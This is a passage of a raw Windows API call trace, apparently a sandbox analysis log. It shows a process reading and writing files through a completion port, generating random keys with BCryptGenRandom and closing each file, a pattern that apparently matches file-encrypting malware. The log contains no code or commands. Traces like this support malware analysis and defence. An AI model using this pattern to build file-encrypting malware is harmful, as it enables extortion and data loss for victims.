lpOverlapped=0x3d70048) returned 1 [0101.984] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.000] ReadFile (in: hFile=0xefc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xbd2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.010] ReadFile (in: hFile=0xf00, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x127e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0102.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.047] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.048] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.049] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.052] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.052] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.052] free (_Block=0x3df0008) [0102.052] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.053] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.053] free (_Block=0x3df0008) [0102.053] free (_Block=0x2071818) [0102.053] free (_Block=0x77d800) [0102.053] WriteFile (in: hFile=0xf04, lpBuffer=0x3df015c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 0x0 [0102.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.075] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.075] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.075] free (_Block=0x3df0008) [0102.075] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.075] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.075] free (_Block=0x3df0008) [0102.075] free (_Block=0x2071818) [0102.075] free (_Block=0x77d800) [0102.075] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.077] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.128] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x385c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.261] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.263] CloseHandle (hObject=0xf00) returned 1 [0102.264] free (_Block=0x1ff1e60) [0102.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.272] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.272] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.272] free (_Block=0x3df0008) [0102.272] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.272] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.272] free (_Block=0x3df0008) [0102.272] free (_Block=0x2071818) [0102.272] free (_Block=0x77d800) [0102.272] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.273] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.285] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x63c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.285] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.286] CloseHandle (hObject=0xf00) returned 1 [0102.288] free (_Block=0x1ff1e60) [0102.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.299] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.299] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.299] free (_Block=0x3df0008) [0102.299] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.299] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.300] free (_Block=0x3df0008) [0102.300] free (_Block=0x2071818) [0102.300] free (_Block=0x77d800) [0102.300] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.300] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.302] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.316] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x728, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.317] CloseHandle (hObject=0xf00) returned 1 [0102.318] free (_Block=0x1ff1e60) [0102.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.330] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.330] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.330] free (_Block=0x3df0008) [0102.330] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.330] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.331] free (_Block=0x3df0008) [0102.331] free (_Block=0x2071818) [0102.331] free (_Block=0x77d800) [0102.331] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.332] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.346] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6cd2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.347] CloseHandle (hObject=0xf00) returned 1 [0102.349] free (_Block=0x1ff1e60) [0102.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0102.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0102.372] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0102.373] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0102.373] free (_Block=0x3df0008) [0102.373] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0102.373] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0102.373] free (_Block=0x3df0008) [0102.373] free (_Block=0x2071818) [0102.373] free (_Block=0x77d800) [0102.373] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.374] WriteFile (in: hFile=0xf00, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.510] CloseHandle (hObject=0xf04) returned 1 [0102.516] free (_Block=0x3df0128) [0102.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.533] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xbc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0102.533] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.546] ReadFile (in: hFile=0x13c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xac4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0102.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.565] ReadFile (in: hFile=0xf04, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ccc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0102.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.603] ReadFile (in: hFile=0x13c8, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x1d74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0102.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.638] ReadFile (in: hFile=0x13c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x83c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0102.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.733] CloseHandle (hObject=0x13c4) returned 1 [0102.741] free (_Block=0x3d70048) [0102.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.749] WriteFile (in: hFile=0xf04, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0102.749] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.761] CloseHandle (hObject=0xf00) returned 1 [0102.769] free (_Block=0x3ef0008) [0102.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0102.769] WriteFile (in: hFile=0x13c8, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0102.769] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.277] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0103.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.289] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.289] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.289] free (_Block=0x77d800) [0103.289] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.289] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.289] free (_Block=0x2071818) [0103.289] free (_Block=0x2071928) [0103.289] free (_Block=0x77d908) [0103.290] WriteFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0103.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0103.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0103.301] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0103.302] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0103.302] free (_Block=0x77d800) [0103.302] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0103.302] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0103.302] free (_Block=0x2071818) [0103.302] free (_Block=0x2071928) [0103.302] free (_Block=0x77d908) [0103.302] WriteFile (in: hFile=0xf00, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 